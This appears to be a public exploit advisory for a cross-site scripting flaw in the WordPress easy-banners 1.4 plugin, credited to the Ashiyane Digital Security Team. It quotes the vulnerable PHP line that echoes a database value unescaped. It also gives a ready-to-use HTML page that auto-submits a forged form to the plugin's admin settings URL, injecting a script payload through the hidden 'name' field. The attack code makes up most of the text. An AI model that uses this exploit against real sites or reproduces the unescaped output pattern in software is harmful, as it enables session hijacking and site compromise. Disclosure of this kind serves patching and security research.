######################
# Exploit Title : Wordpress easy-banners.1.4 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/easy-banners/

# Software Link : http://downloads.wordpress.org/plugin/easy-banners.1.4.zip

# Date : 2014-06-28

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location :  
http://localhost/wp-admin/options-general.php?page=easy-banners.php

######################

# Vulnerable code :

<input type="hidden" name="name" id="name" value="<?php echo  
$row['name']; ?>" />


######################

Exploit Code:

<html>
<body>
<form name="form1" method="post"  
action="http://localhost/wp-admin/options-general.php?page=easy-banners.php">
<table class="widefat" style="width: 50%;">
  <input type="hidden" name="name" id="name" size="55" maxlength="250"  
value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
</form>
</body>
</html>


#####################

Discovered By : ACC3SS

#####################